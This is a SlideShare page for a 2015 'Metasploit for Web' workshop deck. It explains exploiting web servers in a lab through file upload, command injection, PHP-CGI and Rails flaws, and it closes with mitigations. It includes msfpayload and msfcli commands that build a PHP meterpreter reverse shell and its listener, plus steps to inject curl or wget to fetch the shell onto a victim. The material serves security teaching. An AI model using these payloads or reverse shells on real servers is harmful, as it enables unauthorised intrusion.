SlideShare une entreprise Scribd logo

Metasploit for Web Workshop

Télécharger en tant que PPTX, PDF
Dennis Maldonado
Dennis Maldonado

Workshop on Metasploit and how it can be utilized for web application security assessments.

Technologie
1  sur  29
Dennis Maldonado @DennisMald 2015-02-20
 Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer Information Systems Major  Twitter  @DennisMald  Website / Blog  KernelMeltdown.org
 Kali Linux – Our attacker machine  Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.  Metasploitable2 – Victim Web Server
Exploiting the backend server through a web application.
 Reasons why hackers want to compromise the server:  Run attacks against the internal network  Use the server as a bot  Install backdoors onto the server  Reveal sensitive files/passwords  Execute any local file  Execute remote files  and more…
 Vulnerabilities that are dangerous against a server  DirectoryTraversal  Local File Inclusion  Remote File Inclusion  Remote Code Execution  SQL Injection  Command Injection
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/
http://website.com/user.php?id=1&Submit=Submit#
 Metasploit is an open-source framework used for Security development and testing  Information gathering and fingerprinting  Exploitation/Penetration testing  Payload generation and encoding  Fuzzing  And much more…
 Command Line Interfaces  msfconsole  msfcli  GUI Interfaces  Metasploit Community Edition  Armitage
 Modules  Exploit – Exploitation/Proof-of-Concept code ▪ Ruby on Rails exploit ▪ PHP-CGI exploit  Auxiliary – Misc. modules for multiple purposes ▪ Scanners ▪ DDOS tools ▪ Fingerprinting ▪ Clients  Payloads – Code to be executed on the exploited system ▪ System Shells ▪ Meterpreter Shells  Post – Modules for post-exploitation tasks ▪ Persistence ▪ Password Stealing ▪ Pivoting
 Active Exploits  Actively exploit a host.  Ex: Ruby on Rails XML exploit  Passive Exploits  Wait’s for incoming hosts, then exploits them  Ex: Java 0-days  Exploits contain payloads
 Inline (Non Staged)  Payload containing the exploit and shell code  Stable  Large size  Staged  Exploits victim, establishes connection with attacker, pulls down the payload  Meterpreter  Advanced, dynamic payload.  Extended over the network  Extensible through modules and plugins
 Types of connections  Bind ▪ Local server gets started on victim machine ▪ Attacker connects to victim ▪ windows/x64/shell/bind_tcp  Reverse ▪ Local server gets started on attacker machine ▪ Victim connects to attacker ▪ windows/x64/shell/reverse_tcp
 CVE 2012-1823  DOS attack ▪ -T 10000  Source code disclosure ▪ -s argument  Remote Code Execution ▪ -d argument
 CVE-2013-0156  Easy to find, easy to exploit, critical vulnerability.  Requires just one POST request containing a specially crafted XML data.  Send commands through YAML objects
 The upload functionality allows for any file type to be uploaded 1. Upload server-side code and check if it executes ▪ PHP = <?php echo “HelloWorld!”; ?> ▪ ASP = <% Response.Write "HelloWorld!" %> ▪ JSP = <%= new java.util.Date().toString() %> 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Upload the shell and execute it
 Allows an attacker to execute system level commands. 1. Attempt a safe command 1. echo test 2. uname -a 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Inject curl or wget commands to download the shell onto the victim machine. 5. Chmod if necessary and execute
 msfpayload php/meterpreter/reverse_tcp O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php  # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.  ==================================  msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
 Keep software up to date!  PHP: 5.4.3, 5.3.13  Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15  Use whitelisting for file upload extensions  Watch for extensions and content-types  Don’t let upload directory be executable  Rename files if possible  Don’t pass user input as a system command!  Use library calls when possible  Sanitize input
 BackTrack-Linux  http://www.kali.org/  The Metasploit Project  http://www.metasploit.com/  Metasploit Unleashed  http://www.offensive-security.com/metasploit-unleashed/  PHP-CGI Advisory  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  Ruby on Rails Exploitation  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with- metasploit-cve-2013-0156  DamnVulnerable Web Application (DVWA)  http://www.dvwa.co.uk/  Metasploitable 2  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

Recommandé

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
Tiago Henriques
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeMetasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning Tree
E Hacking
 

Recommandé

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
Tiago Henriques
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeMetasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning Tree
E Hacking
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
n|u - The Open Security Community
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware Analysis
Albert Hui
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
securityxploded
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
Andrea Draghetti
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
UTD Computer Security Group
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Tamas K Lengyel
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
xabean
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
Db Cooper
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005
James Morris
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
Security Scope
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege EscalationAide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalation
nullthreat
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live Forever
Gregory Hanis
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
amiable_indian
 
Getting Started in Information Security
Getting Started in Information SecurityGetting Started in Information Security
Getting Started in Information Security
Dennis Maldonado
 
Hacking Access Control Systems
Hacking Access Control SystemsHacking Access Control Systems
Hacking Access Control Systems
Dennis Maldonado
 

Contenu connexe

Tendances

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Tamas K Lengyel
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
Db Cooper
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege EscalationAide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalation
nullthreat
 

Tendances (20)

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware Analysis
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege EscalationAide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalation
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live Forever
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
 

En vedette

Hacking Access Control Systems
Hacking Access Control SystemsHacking Access Control Systems
Hacking Access Control Systems
Dennis Maldonado
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Zuriaty Zaki
 
3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd 3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd
Gambari Isiaka
 

En vedette (13)

Getting Started in Information Security
Getting Started in Information SecurityGetting Started in Information Security
Getting Started in Information Security
 
Hacking Access Control Systems
Hacking Access Control SystemsHacking Access Control Systems
Hacking Access Control Systems
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Jenis jenis contoh surat kiriman
Jenis jenis contoh surat kirimanJenis jenis contoh surat kiriman
Jenis jenis contoh surat kiriman
 
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
 
3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd 3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd
 
Contoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknikContoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknik
 
Surat kebenaran bawa kenderaan
Surat kebenaran bawa kenderaanSurat kebenaran bawa kenderaan
Surat kebenaran bawa kenderaan
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
 
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
 
Contoh surat rasmi.
Contoh surat rasmi.Contoh surat rasmi.
Contoh surat rasmi.
 
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe ÖnalNetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
 
Surat permohonan dan permintaan
Surat permohonan dan permintaanSurat permohonan dan permintaan
Surat permohonan dan permintaan
 

Similaire à Metasploit for Web Workshop

Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
Shellmates
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
webhostingguy
 

Similaire à Metasploit for Web Workshop (20)

Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 

Dernier

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Dernier (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 

Metasploit for Web Workshop

  • 2.  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer Information Systems Major  Twitter  @DennisMald  Website / Blog  KernelMeltdown.org
